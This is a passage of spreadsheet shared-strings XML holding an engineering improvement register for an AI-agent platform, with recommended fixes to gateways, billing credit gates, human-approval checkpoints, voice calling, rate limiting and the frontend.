`integration_registry`. For a 30-iteration run with four critic stages, that is well over a
hundred resolutions of a value that cannot change mid-run.
Resolve once at run start and thread it through. The API-key cache
([LP-22](#lp-22--the-api-key-cache-is-per-process-and-busted-only-locally)) partly hides
this today at the cost of correctness.</t>
  </si>
  <si>
    <t>LP-I6</t>
  </si>
  <si>
    <t>Make the key cache invalidation cross-process</t>
  </si>
  <si>
    <t>### LP-I6 — Make the key cache invalidation cross-process
**Effect: medium.** [LP-22](#lp-22--the-api-key-cache-is-per-process-and-busted-only-locally).
Publish an invalidation message on Redis when a key rotates; every worker drops its entry.
Redis is already a dependency and already used for pub/sub.</t>
  </si>
  <si>
    <t>LP-I7</t>
  </si>
  <si>
    <t>Stream text responses</t>
  </si>
  <si>
    <t>### LP-I7 — Stream text responses
**Effect: medium for perceived speed.** Streaming exists only in the voice path. For a
long generation, the user watches a spinner for the entire call even though the SSE trace
infrastructure to relay tokens already exists.</t>
  </si>
  <si>
    <t>LP-I8</t>
  </si>
  <si>
    <t>Pair tool calls by id everywhere</t>
  </si>
  <si>
    <t>### LP-I8 — Pair tool calls by id everywhere
**Effect: medium.** [LP-17](#lp-17--tool-results-are-paired-to-calls-by-name-on-two-of-three-providers).
Azure already does it correctly. Making Gemini and Anthropic match removes a silent
wrong-answer path that gets more likely as parallel tool use increases.</t>
  </si>
  <si>
    <t>LP-I9</t>
  </si>
  <si>
    <t>Write an LLMInteractionLog for every call</t>
  </si>
  <si>
    <t>### LP-I9 — Write an `LLMInteractionLog` for every call
**Effect: medium.** Only the step executor writes these rows. Planner and critic spend
appears in `usage_logs` and `run.total_cost_usd` with **no interaction row**, so the "what
did the model actually see" view is missing for the calls most likely to need debugging —
the ones the user did not directly cause.</t>
  </si>
  <si>
    <t>LP-I10</t>
  </si>
  <si>
    <t>Flag a truncated ReAct loop</t>
  </si>
  <si>
    <t>### LP-I10 — Flag a truncated ReAct loop
**Effect: small, prevents wrong conclusions.**
[LP-19](#lp-19--a-react-loop-that-hits-the-turn-cap-returns-normally). One boolean on the
response. The critics and `_final_status` can then tell "finished" from "ran out of turns",
which today they cannot.
---</t>
  </si>
  <si>
    <t>MI-I1</t>
  </si>
  <si>
    <t>Make the gates fail closed</t>
  </si>
  <si>
    <t>### MI-I1 — Make the gates fail closed
**Effect: large for safety, small in code.**
[MI-01](#mi-01--the-duplicate-check-fails-open). Three `except` blocks currently turn a
broken check into a permission. Invert them, and emit a metric on gate failure so a
persistently broken gate is visible rather than silently permissive.</t>
  </si>
  <si>
    <t>MI-I2</t>
  </si>
  <si>
    <t>Move anti-sprawl into the creation service</t>
  </si>
  <si>
    <t>### MI-I2 — Move anti-sprawl into the creation service
**Effect: large.** [MI-02](#mi-02--antisprawlguard-advises-and-only-one-caller-listens).
Today one of several creation paths enforces the limits. Moving the check into
`AIService.create_entity` makes it universal and removes the possibility of a new creation
path forgetting.</t>
  </si>
  <si>
    <t>MI-I3</t>
  </si>
  <si>
    <t>Give the Architect a real rewrite, or drop the loop</t>
  </si>
  <si>
    <t>### MI-I3 — Give the Architect a real rewrite, or drop the loop
**Effect: large on cost and outcome.**
[MI-06](#mi-06--the-architect-cannot-revise-so-the-critic-loop-cannot-converge). Right now
every spec costs three critic calls that cannot change the outcome, and then blocks.
Either wire the Meta-Agent entity in as the rewriter — the docstring anticipates exactly
this — or run one critique and stop. The current shape is the worst of both.</t>
  </si>
  <si>
    <t>MI-I4</t>
  </si>
  <si>
    <t>Cache the platform schema compilation</t>
  </si>
  <si>
    <t>### MI-I4 — Cache the platform schema compilation
**Effect: medium.** `platform_schema_compiler.py` is 898 lines that walk the entire
capability surface — every tool, every schema, every enum — to produce the "firmware" JSON
injected into Meta-Agent prompts.
The result changes only when code changes. Compile at startup and cache with the hash it
already computes, rather than recompiling per request.</t>
  </si>
  <si>
    <t>MI-I5</t>
  </si>
  <si>
    <t>Score reuse so semantic similarity can matter</t>
  </si>
  <si>
    <t>### MI-I5 — Score reuse so semantic similarity can matter
**Effect: medium.** [MI-09](#mi-09--semantic-similarity-alone-can-never-trigger-reuse).
Either raise the semantic weight or lower the ADAPT threshold so a strong semantic match
can carry a decision. As configured, the most expensive signal in the scorer is also the
one that can never be decisive.</t>
  </si>
  <si>
    <t>MI-I6</t>
  </si>
  <si>
    <t>Make skipped tests visible everywhere</t>
  </si>
  <si>
    <t>### MI-I6 — Make skipped tests visible everywhere
**Effect: medium.** [MI-05](#mi-05--a-skipped-test-case-is-not-a-failed-one) and
[MI-18](#mi-18--the-test-budget-is-shared-and-exhaustion-looks-like-a-pass). A suite result
should carry `ran`, `passed`, `failed`, `skipped`. Then G4 is a sanity check rather than
the only thing standing between an untested spec and promotion.</t>
  </si>
  <si>
    <t>MI-I7</t>
  </si>
  <si>
    <t>Notify when human-gated queues have items</t>
  </si>
  <si>
    <t>### MI-I7 — Notify when human-gated queues have items
**Effect: medium.** Four things wait for a human: merge proposals, skill candidates,
prompt candidates and DRAFT tool promotions. None of them notifies anyone.
A count on the admin dashboard, or a weekly digest, turns four dormant queues into a
working review process. Without it, the "requires a human" column of the safety table
means "never happens".</t>
  </si>
  <si>
    <t>MI-I8</t>
  </si>
  <si>
    <t>Prune the tree by age and confidence, not by count</t>
  </si>
  <si>
    <t>### MI-I8 — Prune the tree by age and confidence, not by count
**Effect: medium.** [MI-15](#mi-15--tree-sections-cap-at-200-rows-and-drop-the-oldest-silently).
LRU on `last_seen` evicts exactly the rare-but-important entries. Age plus a floor on
high-confidence rows keeps the useful ones.</t>
  </si>
  <si>
    <t>MI-I9</t>
  </si>
  <si>
    <t>Rate-limit entity creation within the day</t>
  </si>
  <si>
    <t>### MI-I9 — Rate-limit entity creation within the day
**Effect: small.** [MI-03](#mi-03--the-daily-creation-limit-is-company-wide-with-no-rate-limit).
A per-minute cap alongside the daily one turns a burst into a trickle, which is what you
want from a runaway loop. `ai/governance/rate_limiter.py` is a working sliding-window
limiter with zero call sites — this is a natural first one.</t>
  </si>
  <si>
    <t>MI-I10</t>
  </si>
  <si>
    <t>Act on schema drift</t>
  </si>
  <si>
    <t>### MI-I10 — Act on schema drift
**Effect: small.** [MI-19](#mi-19--drift-detection-compares-a-hash-nothing-acts-on). The
hash is already computed. Gate promotion on it, or at minimum surface it on the
Meta-Intelligence page. Detection that produces no action is a log line.
---</t>
  </si>
  <si>
    <t>VT-I1</t>
  </si>
  <si>
    <t>Reconcile voice billing against the provider</t>
  </si>
  <si>
    <t>### VT-I1 — Reconcile voice billing against the provider
**Effect: large.** [VT-05](#vt-05--voice-tokens-are-estimated-at-a-flat-167-per-second).
Both LLM rows bill the full call duration at a flat 167 tokens/second estimate. Gemini Live
reports real usage; capture it and bill from that, keeping the estimate only as a fallback
when the provider does not report.
Until then, voice margin is unknown in both directions.</t>
  </si>
  <si>
    <t>VT-I2</t>
  </si>
  <si>
    <t>Enforce max_calls_per_hour</t>
  </si>
  <si>
    <t>### VT-I2 — Enforce `max_calls_per_hour`
**Effect: medium.** [VT-09](#4-t2--controls-that-are-stored-and-ignored). The current
throttle is `max_concurrent_calls` plus a flat 2-second sleep, which for 5 concurrent calls
is roughly 9,000 calls per hour. A tenant who sets 200/hour and gets thousands has a
compliance problem, not a performance one.</t>
  </si>
  <si>
    <t>VT-I3</t>
  </si>
  <si>
    <t>Invalidate the agent cache on entity update</t>
  </si>
  <si>
    <t>### VT-I3 — Invalidate the agent cache on entity update
**Effect: medium.** [VT-16](#vt-16--agent-edits-take-up-to-five-minutes-to-reach-new-calls).
Publish an invalidation on Redis when an entity is saved. Keeps the 5-second cold-load
saving and removes the five-minute surprise.</t>
  </si>
  <si>
    <t>VT-I4</t>
  </si>
  <si>
    <t>Attribute voice tool calls to a run</t>
  </si>
  <si>
    <t>### VT-I4 — Attribute voice tool calls to a run
**Effect: large for auditability.** [VT-06](#vt-06--voice-tool-calls-are-unattributed-and-unbilled).
Create a lightweight `ExecutionRun` per call — or at minimum stamp `run_id` and `agent_id`
into `extra_context` — so tool calls made on the phone are billed and traceable like every
other tool call.
This is also the smallest step towards fixing
[VT-21](#vt-21--a-voice-call-has-no-run-record-so-nothing-about-it-is-auditable-the-usual-way).</t>
  </si>
  <si>
    <t>VT-I5</t>
  </si>
  <si>
    <t>Attach recordings by call id only</t>
  </si>
  <si>
    <t>### VT-I5 — Attach recordings by call id only
**Effect: medium.** [VT-07](#vt-07--recording-artifact-lookup-can-attach-the-wrong-file).
Delete the time-proximity fallback. A missing recording is better than the wrong customer's
recording.</t>
  </si>
  <si>
    <t>VT-I6</t>
  </si>
  <si>
    <t>Write the call summary into CORTEX</t>
  </si>
  <si>
    <t>### VT-I6 — Write the call summary into CORTEX
**Effect: medium.** Today a call produces one summary stored on
`context_state.call_summary` and nothing else. Writing it as an episodic node would let a
returning caller be recognised, and would make voice history available to the text agents
that share the same entity.
This depends on [MC-I1](08-MEMORY-AND-CORTEX-DEFECTS.md#mc-i1--wire-the-read-path) — there
is no point writing more memory until something reads it.</t>
  </si>
  <si>
    <t>VT-I7</t>
  </si>
  <si>
    <t>Cache the Tata auth token across workers</t>
  </si>
  <si>
    <t>### VT-I7 — Cache the Tata auth token across workers
**Effect: small.** `TATA_AUTH_TOKEN_TTL_SECONDS` defaults to 43,200 (12 hours), but the
cache is per process. Every worker performs its own Smartflo login. Moving it to Redis
makes it one login per 12 hours across the fleet.</t>
  </si>
  <si>
    <t>VT-I8</t>
  </si>
  <si>
    <t>Report campaign throughput honestly</t>
  </si>
  <si>
    <t>### VT-I8 — Report campaign throughput honestly
**Effect: medium.** The dialer's real behaviour is `max_concurrent_calls` plus a flat
2-second sleep. The UI presents `max_calls_per_hour` and `max_retries` as controls
([VT-09](#4-t2--controls-that-are-stored-and-ignored),
[VT-10](#4-t2--controls-that-are-stored-and-ignored)). Either enforce them or show the
actual expected throughput on the campaign form, so an operator can plan.</t>
  </si>
  <si>
    <t>VT-I9</t>
  </si>
  <si>
    <t>Implement DTMF, or say it is not supported</t>
  </si>
  <si>
    <t>### VT-I9 — Implement DTMF, or say it is not supported
**Effect: medium.** [VT-13](#4-t2--controls-that-are-stored-and-ignored). No digit
collection means no IVR, no "press 1 to speak to sales", no keypad confirmation of a
booking. For an outbound sales product that is a real functional gap, and today a customer
discovers it only after building a campaign around it.</t>
  </si>
  <si>
    <t>VT-I10</t>
  </si>
  <si>
    <t>One place that decides whether a call may proceed</t>
  </si>
  <si>
    <t>### VT-I10 — One place that decides whether a call may proceed
**Effect: medium.** Credit gating happens at three points with three different behaviours,
and two of them are broken or inconsistent
([VT-01](#vt-01--the-inbound-credit-gate-has-never-run),
[VT-08](#vt-08--the-outbound-and-inbound-credit-gates-disagree-by-design)). One
`can_start_call(company_id, direction)` used by all three would make the policy explicit
and testable.
---</t>
  </si>
  <si>
    <t>GW-I1</t>
  </si>
  <si>
    <t>Add SlowAPIMiddleware</t>
  </si>
  <si>
    <t>### GW-I1 — Add `SlowAPIMiddleware`
**Effect: large, one line.** [GW-02](#gw-02--rate-limiting-covers-one-route). Everything on
the gateway is unlimited today except the REST proxy, including the two endpoints that can
start billable work without a login.</t>
  </si>
  <si>
    <t>GW-I2</t>
  </si>
  <si>
    <t>Set RemoteIPHeader in the vhosts</t>
  </si>
  <si>
    <t>### GW-I2 — Set `RemoteIPHeader` in the vhosts
**Effect: large, two lines of Apache config.**
[GW-05](#gw-05--rate-limits-are-keyed-on-127001-in-production). Without it, GW-I1 gives you
one global bucket rather than per-client limits — so these two changes belong in the same
commit.</t>
  </si>
  <si>
    <t>GW-I3</t>
  </si>
  <si>
    <t>Persist webhook envelopes before acknowledging</t>
  </si>
  <si>
    <t>### GW-I3 — Persist webhook envelopes before acknowledging
**Effect: large.** [GW-07](#gw-07--the-event-bus-is-in-process-with-one-subscriber). Once a
provider is told `200 OK`, the platform owns that event. An `asyncio.Queue` is not a
durable owner. Write it to Postgres or push it to Redis before returning.
This also gives [GW-03](#gw-03--no-webhook-idempotency) somewhere to record the delivery id.</t>
  </si>
  <si>
    <t>GW-I4</t>
  </si>
  <si>
    <t>Verify signatures and fail closed</t>
  </si>
  <si>
    <t>### GW-I4 — Verify signatures and fail closed
**Effect: large.** [GW-01](#gw-01--no-webhook-signature-is-ever-verified-and-a-failure-would-not-block).
Three HMAC implementations, plus changing `if not validate: log` into `if not validate:
return 401`. Do the second half even before the first — a `False` that does not block is
worse than no check, because it looks like a check.</t>
  </si>
  <si>
    <t>GW-I5</t>
  </si>
  <si>
    <t>Return 503 instead of running the loop in the gateway</t>
  </si>
  <si>
    <t>### GW-I5 — Return 503 instead of running the loop in the gateway
**Effect: medium, removes a failure amplifier.**
[GW-08](#gw-08--the-arq-fallback-runs-a-full-agentloop-inside-the-gateway). The fallback
turns "Redis is down" into "Redis is down **and** live calls stutter". Provider retries
already handle the alternative.</t>
  </si>
  <si>
    <t>GW-I6</t>
  </si>
  <si>
    <t>Validate the WebSocket token in the endpoint</t>
  </si>
  <si>
    <t>### GW-I6 — Validate the WebSocket token in the endpoint
**Effect: medium.** [GW-04](#gw-04--the-auth-middleware-never-sees-a-websocket). The
handshake already carries `?client_id=` and `?token=`; the token is simply never checked.
Do it in the endpoint, where the scope exists, and delete the dead middleware branch.</t>
  </si>
  <si>
    <t>GW-I7</t>
  </si>
  <si>
    <t>Give SSE an event id and a short replay buffer</t>
  </si>
  <si>
    <t>### GW-I7 — Give SSE an event id and a short replay buffer
**Effect: medium.** [GW-18](#gw-18--sse-has-no-replay-and-no-last-event-id). `seq` already
exists on `execution_trace_events` and is monotonic per run. Emitting it as the SSE event
id and honouring `Last-Event-ID` on reconnect would let the frontend drop its 3-second
poll entirely — removing a constant query per open execution page.</t>
  </si>
  <si>
    <t>GW-I8</t>
  </si>
  <si>
    <t>Reuse one httpx client and close it properly</t>
  </si>
  <si>
    <t>### GW-I8 — Reuse one `httpx` client and close it properly
**Effect: small.** The shared lazily-created client is right; the shutdown that closes it
never runs ([GW-12](#4-t2--delete)). Move the close into the `lifespan` shutdown half so
connections are released on restart.</t>
  </si>
  <si>
    <t>GW-I9</t>
  </si>
  <si>
    <t>Make the proxy header handling explicit</t>
  </si>
  <si>
    <t>### GW-I9 — Make the proxy header handling explicit
**Effect: small, prevents a future outage.**
[GW-15](#gw-15--the-proxy-copies-response-headers-verbatim-after-decompressing). Strip
`content-encoding` and `content-length`. Today's correctness depends on the backend never
enabling compression, which is not a property anyone is tracking.</t>
  </si>
  <si>
    <t>GW-I10</t>
  </si>
  <si>
    <t>Decide the video story</t>
  </si>
  <si>
    <t>### GW-I10 — Decide the video story
**Effect: medium.** [GW-10](#gw-10--aiortc-is-not-installed-and-the-video-path-has-a-second-bug-behind-it).
The endpoint, the signalling protocol, the STUN/TURN settings, the session dict and the
Apache upgrade rule all exist for a feature that cannot run. Either finish it or remove all
five, so the surface reflects what the product does.
---</t>
  </si>
  <si>
    <t>BC-I1</t>
  </si>
  <si>
    <t>Call the credit gates that already exist</t>
  </si>
  <si>
    <t>### BC-I1 — Call the credit gates that already exist
**Effect: the largest single change in this register, and most of the code is written.**
[BC-05](#bc-05--three-of-the-four-credit-gates-have-no-callers). Two call sites in
`AgentLoop`: `check_credit_gate` at run start, `check_credit_circuit_breaker` after each
step. Both methods exist and are unit-tested.
This restores the pre-run gate and the mid-run breaker the product already claims to have,
and it makes the user-facing "top up and retry" message reachable.</t>
  </si>
  <si>
    <t>BC-I2</t>
  </si>
  <si>
    <t>Credit holds instead of settle-at-the-end</t>
  </si>
  <si>
    <t>### BC-I2 — Credit holds instead of settle-at-the-end
**Effect: large.** [BC-06](#bc-06--there-are-no-holds-so-one-run-can-overdraw). Reserve an
estimate at dispatch, release the difference at settlement. The estimator already exists in
`planning/cost_estimator.py` and is refreshed nightly from telemetry.
This is what makes overdraw structurally impossible rather than caught late.</t>
  </si>
  <si>
    <t>BC-I3</t>
  </si>
  <si>
    <t>### BC-I3 — One cost write path
**Effect: large.** [BC-07](#bc-07--fixed-cost-tool-charges-write-no-usage_logs-row),
[BC-08](#bc-08--image-generation-is-charged-twice),
[BC-09](#bc-09--attributionactor_step-is-never-written) and
[BC-11](#bc-11--four-price-tables-and-the-intended-source-of-truth-is-unused) are all the
same problem: several code paths write cost in several ways.
Make every spender write **one attributed `usage_logs` row** and nothing else. Then
`run.total_cost_usd` is a sum, the attribution dashboard is correct by construction, and
double-charging becomes impossible.
Wire `ToolCostResolver` as the single price lookup in the same change and delete the other
three tables.</t>
  </si>
  <si>
    <t>BC-I4</t>
  </si>
  <si>
    <t>Schedule the crons</t>
  </si>
  <si>
    <t>### BC-I4 — Schedule the crons
**Effect: large.** [BC-04](#bc-04--the-billing-crons-are-never-scheduled). Two entries in
`WorkerSettings.cron_jobs`, next to the seven that are already there. Also change the daily
job from an assignment to a top-up so re-running it is safe.</t>
  </si>
  <si>
    <t>BC-I5</t>
  </si>
  <si>
    <t>Add the Razorpay webhook</t>
  </si>
  <si>
    <t>### BC-I5 — Add the Razorpay webhook
**Effect: large.** [BC-01](#bc-01--the-client-chooses-how-much-to-credit-its-own-wallet).
Browser-initiated verification cannot be trusted, whatever the signature check does. A
server-to-server webhook with the delivery id recorded gives amount validation and replay
protection at once.
Even before the webhook, credit `txn.amount` and check `txn.status`. That is two lines and
it closes the worst of it.</t>
  </si>
  <si>
    <t>BC-I6</t>
  </si>
  <si>
    <t>Validate pricing inputs on write</t>
  </si>
  <si>
    <t>### BC-I6 — Validate pricing inputs on write
**Effect: medium, prevents a very expensive mistake.**
[BC-21](#bc-21--percentages-and-fractions-are-mixed-with-the-wrong-label). Range-check
`pf`, `spf` and `d` to `[0, 1]`, fix the UI label, and gate `company_id: null` to
`app_admin` ([BC-19](#bc-19--partner_admin-can-edit-platform-wide-pricing)).</t>
  </si>
  <si>
    <t>BC-I7</t>
  </si>
  <si>
    <t>Reap abandoned payments and subscriptions</t>
  </si>
  <si>
    <t>### BC-I7 — Reap abandoned payments and subscriptions
**Effect: small.** [BC-18](#4-t2--gates-and-jobs-that-never-run). One query in the daily
job: mark `pending` transactions older than 24 hours as `expired`, and orphaned
`pending_payment` subscriptions as `failed`. Without it, the payments table is a growing
pile of rows that mean nothing.</t>
  </si>
  <si>
    <t>BC-I8</t>
  </si>
  <si>
    <t>Make cost queryable per run without a join storm</t>
  </si>
  <si>
    <t>### BC-I8 — Make cost queryable per run without a join storm
**Effect: medium.** Answering "why was I charged $X?" today means joining `usage_logs`,
`llm_interaction_logs`, `tool_interaction_logs` and `billing_events`, none of which are
indexed on the columns used
([DM-05](03-DATA-MODEL-DEFECTS.md#dm-05--execution_runs-has-no-index-on-company_id-or-entity_id),
[DM-06](03-DATA-MODEL-DEFECTS.md#dm-06--log-tables-have-no-indexes-at-all)).
A single per-run cost breakdown endpoint, backed by `usage_logs` alone once BC-I3 lands,
turns a support investigation into one call.</t>
  </si>
  <si>
    <t>BC-I9</t>
  </si>
  <si>
    <t>Reconcile telephony rounding</t>
  </si>
  <si>
    <t>### BC-I9 — Reconcile telephony rounding
**Effect: small.** [BC-12](#bc-12--telephony-minutes-are-rounded-two-different-ways). Pick
one rounding rule and use it in both places. Today every telephony reconciliation shows a
difference that is not a real difference.</t>
  </si>
  <si>
    <t>BC-I10</t>
  </si>
  <si>
    <t>Remove the Stripe dependency</t>
  </si>
  <si>
    <t>### BC-I10 — Remove the Stripe dependency
**Effect: small.** [BC-25](#bc-25--stripe-is-a-dependency-with-no-code-and-verify_topup-returns-a-duplicate-key).
A payment SDK in the dependency list with no code behind it is a maintenance and audit
liability, and it implies a payment path that does not exist.
---</t>
  </si>
  <si>
    <t>GH-I1</t>
  </si>
  <si>
    <t>Decide fail-open vs fail-closed once, deliberately</t>
  </si>
  <si>
    <t>### GH-I1 — Decide fail-open vs fail-closed once, deliberately
**Effect: the most important change in this register.**
[GH-21](#gh-21--almost-every-gate-in-the-platform-fails-open). Not every gate should fail
closed — a rate limiter arguably should not. But the decision should be made per gate and
written down, rather than inherited from "make sure the control cannot break a run".
The two that clearly must fail closed are HITL
([GH-01](#gh-01--if-redis-is-down-every-hitl-checkpoint-is-skipped)) and webhook signatures
([GW-01](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-01--no-webhook-signature-is-ever-verified-and-a-failure-would-not-block)).</t>
  </si>
  <si>
    <t>GH-I2</t>
  </si>
  <si>
    <t>Emit a metric whenever a gate fails to evaluate</t>
  </si>
  <si>
    <t>### GH-I2 — Emit a metric whenever a gate fails to evaluate
**Effect: large, and it is the prerequisite for everything else.** Whatever a gate does on
failure, it must be **countable**. One counter per gate, incremented on the exception path.
Without this, [GH-01](#gh-01--if-redis-is-down-every-hitl-checkpoint-is-skipped) and
[GH-02](#gh-02--two-of-the-four-credit-gates-are-never-called) can persist indefinitely,
which is exactly what happened.</t>
  </si>
  <si>
    <t>GH-I3</t>
  </si>
  <si>
    <t>Pause instead of blocking on HITL</t>
  </si>
  <si>
    <t>### GH-I3 — Pause instead of blocking on HITL
**Effect: large on throughput.** [GH-07](#gh-07--a-hitl-wait-blocks-a-worker-slot). Park the
run in `PAUSED`, release the worker, re-enqueue when the approval is answered. `PAUSED` and
`RESUMING` already exist in the status machine, and `resume_execution` is already a
registered arq job.
This also makes long approval windows a feature — an overnight approval becomes reasonable
instead of a capacity problem.</t>
  </si>
  <si>
    <t>GH-I4</t>
  </si>
  <si>
    <t>Typed exceptions for HITL outcomes</t>
  </si>
  <si>
    <t>### GH-I4 — Typed exceptions for HITL outcomes
**Effect: medium.** [GH-06](#gh-06--reject-and-timeout-are-detected-by-matching-exception-text).
Two exception classes replace two substring matches. The current code is one message edit
away from turning every rejection into an approval.</t>
  </si>
  <si>
    <t>GH-I5</t>
  </si>
  <si>
    <t>Call the credit gates that exist</t>
  </si>
  <si>
    <t>### GH-I5 — Call the credit gates that exist
**Effect: large.** [GH-02](#gh-02--two-of-the-four-credit-gates-are-never-called). Two call
sites in `AgentLoop`. See
[BC-I1](14-BILLING-AND-CREDITS-DEFECTS.md#bc-i1--call-the-credit-gates-that-already-exist).</t>
  </si>
  <si>
    <t>GH-I6</t>
  </si>
  <si>
    <t>Add a company-level budget</t>
  </si>
  <si>
    <t>### GH-I6 — Add a company-level budget
**Effect: medium.** [GH-18](#gh-18--budget-lives-on-the-entity-not-the-company). One
`max_monthly_spend_usd` on the company, checked in the same place as the credit gate. Gives
an operator a single lever, and gives a tenant admin a cap they can reason about without
editing 40 entities.</t>
  </si>
  <si>
    <t>GH-I7</t>
  </si>
  <si>
    <t>Show the winning tier on the flags page</t>
  </si>
  <si>
    <t>### GH-I7 — Show the winning tier on the flags page
**Effect: medium.** [GH-20](#gh-20--there-is-no-way-to-see-why-a-flag-has-its-value). The
resolver already knows which tier answered. Returning it turns a multi-query investigation
into a glance.</t>
  </si>
  <si>
    <t>GH-I8</t>
  </si>
  <si>
    <t>Audit the flag catalogue and delete what does nothing</t>
  </si>
  <si>
    <t>### GH-I8 — Audit the flag catalogue and delete what does nothing
**Effect: medium.** [GH-16](#4-t2--feature-flags-that-are-not-controls). At least eight
flags on the admin page have no reader. A test asserting every key in `DEFAULTS` appears in
a `get_bool` call somewhere would keep the catalogue honest, and would have caught
`sandbox.container_runtime_enabled` — the one where the flag says "on" and the runtime says
"off"
([TX-01](09-TOOLS-DEFECTS.md#tx-01--the-per-company-sandbox-flag-is-never-read)).</t>
  </si>
  <si>
    <t>GH-I9</t>
  </si>
  <si>
    <t>Give numeric flags an env tier</t>
  </si>
  <si>
    <t>### GH-I9 — Give numeric flags an env tier
**Effect: small.** [GH-13](#4-t2--feature-flags-that-are-not-controls). `get_float` skips
`AI_FLAG_*`. Adding it makes numeric knobs settable in an incident without a database
write, which is the whole point of the env tier.</t>
  </si>
  <si>
    <t>GH-I10</t>
  </si>
  <si>
    <t>Wire RedisRateLimiter as the per-tenant quota</t>
  </si>
  <si>
    <t>### GH-I10 — Wire `RedisRateLimiter` as the per-tenant quota
**Effect: medium.** [GH-03](#gh-03--the-rate-limiter-fails-open-and-has-no-callers-anyway).
A correct sliding-window limiter with no callers, and no per-tenant quota anywhere in the
platform. Its own docstring names the key format. Use it for tool calls per company, and
for entity creation ([MI-I9](11-META-INTELLIGENCE-DEFECTS.md#mi-i9--rate-limit-entity-creation-within-the-day)).
---</t>
  </si>
  <si>
    <t>FE-I1</t>
  </si>
  <si>
    <t>Add an error boundary, a lint config and a test runner</t>
  </si>
  <si>
    <t>### FE-I1 — Add an error boundary, a lint config and a test runner
**Effect: large, and it is one afternoon.**
[FE-01](#fe-01--there-is-no-error-boundary),
[FE-02](#fe-02--npm-run-lint-cannot-run),
[FE-03](#fe-03--there-is-no-test-runner). All three dependencies are already installed;
what is missing is configuration.
Do these first. Every other item in this file is easier to fix afterwards, and two of them
would have been caught automatically.</t>
  </si>
  <si>
    <t>FE-I2</t>
  </si>
  <si>
    <t>Stop the polls</t>
  </si>
  <si>
    <t>### FE-I2 — Stop the polls
**Effect: large, immediate.** [FE-19](#fe-19--the-execution-poll-never-stops). Clear the
interval on terminal status. Then, when the SSE stream gains replay
([GW-I7](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-i7--give-sse-an-event-id-and-a-short-replay-buffer)),
the polling can be removed entirely rather than merely stopped.</t>
  </si>
  <si>
    <t>FE-I3</t>
  </si>
  <si>
    <t>Adopt a query cache</t>
  </si>
  <si>
    <t>### FE-I3 — Adopt a query cache
**Effect: large.** [FE-21](#fe-21--no-caching-layer-and-fan-out-on-mount).
`@tanstack/react-query` would remove most of the polling, all of the manual `loading` state,
the refetch-everything-after-mutation pattern, and the fan-out on remount — replacing four
separate problems with one dependency.
It also gives request deduplication, which fixes the `EntityFlow` N+1 without changing that
component at all.</t>
  </si>
  <si>
    <t>FE-I4</t>
  </si>
  <si>
    <t>Lazy-load the background and make it sleep</t>
  </si>
  <si>
    <t>### FE-I4 — Lazy-load the background and make it sleep
**Effect: large for first paint and battery.**
[FE-17](#fe-17--the-webgl-background-never-sleeps). Four changes: cancel the RAF, pause on
hidden, respect `prefers-reduced-motion`, lazy-load it. The last one alone takes ~600 KB out
of the entry chunk, which is what stands between the user and the login form.</t>
  </si>
  <si>
    <t>FE-I5</t>
  </si>
  <si>
    <t>Memoise the two heavy components</t>
  </si>
  <si>
    <t>### FE-I5 — Memoise the two heavy components
**Effect: medium.** [FE-18](#fe-18--executiondetail-walks-the-whole-run-tree-on-every-render)
and [FE-20](#fe-20--entityconfigurationtabs-re-renders-everything-on-every-keystroke).
`useMemo` around the three tree walks in `ExecutionDetail`, and around the filter lists in
`EntityConfigurationTabs`. No restructuring needed — these are the two files where the
absence of memoisation costs the most.</t>
  </si>
  <si>
    <t>FE-I6</t>
  </si>
  <si>
    <t>Route everything through apiClient</t>
  </si>
  <si>
    <t>### FE-I6 — Route everything through `apiClient`
**Effect: medium.** [FE-07](#fe-07--half-the-pages-bypass-apiclient-and-lose-token-refresh).
The streaming pages and `PhonePool` are the exceptions. Converting them gives those pages
401-refresh-retry, consistent error handling and one place to add request timing.</t>
  </si>
  <si>
    <t>FE-I7</t>
  </si>
  <si>
    <t>Generate the API types from the backend</t>
  </si>
  <si>
    <t>### FE-I7 — Generate the API types from the backend
**Effect: medium.** `types/index.ts` is hand-maintained against a FastAPI backend that
publishes an OpenAPI schema. Every backend field rename is a silent frontend break today —
the kind of drift that produced
[FE-09](#fe-09--timestamps-are-wrong-unless-routed-through-a-helper) and the
`_INITIAL`/`spans` mismatch in the untyped test.</t>
  </si>
  <si>
    <t>FE-I8</t>
  </si>
  <si>
    <t>Derive the sidebar from the router</t>
  </si>
  <si>
    <t>### FE-I8 — Derive the sidebar from the router
**Effect: medium.** The sidebar and the route table are two separate lists with two separate
role predicates, and they **have already drifted** — `/reports/costing` is in one and not the
other, which is the only thing hiding an unguarded endpoint
([PO-04](01-PRODUCT-OVERVIEW-DEFECTS.md#po-04--any-logged-in-user-can-read-the-internal-cost-report)).
One list, with `showInNav` and `allowedRoles` per entry, makes that drift impossible.</t>
  </si>
  <si>
    <t>FE-I9</t>
  </si>
  <si>
    <t>Add manualChunks for the shared vendor libraries</t>
  </si>
  <si>
    <t>### FE-I9 — Add `manualChunks` for the shared vendor libraries
**Effect: medium.** [FE-22](#fe-22--recharts-may-be-duplicated-across-13-chunks). An explicit
vendor chunk for `recharts`, `react`, `react-dom` and `react-router-dom` makes the bundle
layout deterministic instead of dependent on Rollup heuristics. Also defer the Razorpay
script to the wallet page.</t>
  </si>
  <si>
    <t>FE-I10</t>
  </si>
  <si>
    <t>Build the frontend for production</t>
  </si>
  <si>
    <t>### FE-I10 — Build the frontend for production
**Effect: large.** The SPA is served by `vite` (`npm run dev`) in production with `hmr:
false`. There is a `build` script and nothing uses it.
A dev server is slower, holds more memory, does no minification or asset hashing, and has a
much larger attack surface than a directory of static files behind Apache. Same item as
[SA-I1](02-SYSTEM-ARCHITECTURE-DEFECTS.md#sa-i1--serve-the-frontend-as-a-build-not-a-dev-server).
---</t>
  </si>
  <si>
    <t>API-I1</t>
  </si>
  <si>
    <t>Add a route census to the merge gate</t>
  </si>
  <si>
    <t>### API-I1 — Add a route census to the merge gate
**Effect: large.** Compare the router decorators against the documented surface in
`17-api-reference.md`. It would catch undocumented routes, dead routers
([API-08](#api-08--apiv1phone-pool-does-not-exist-at-runtime)), mount-order mistakes
([GW-20](13-GATEWAY-AND-REALTIME-DEFECTS.md#gw-20--the-catch-all-proxy-must-stay-last-and-nothing-enforces-it))
and frontend calls to nonexistent endpoints
([API-05](#api-05--the-frontend-calls-a-delete-route-that-does-not-exist)).
This is the first of the four guardrails named in the platform register, and the cheapest
to write.</t>
  </si>
  <si>
    <t>API-I2</t>
  </si>
  <si>
    <t>Surface failed router mounts</t>
  </si>
  <si>
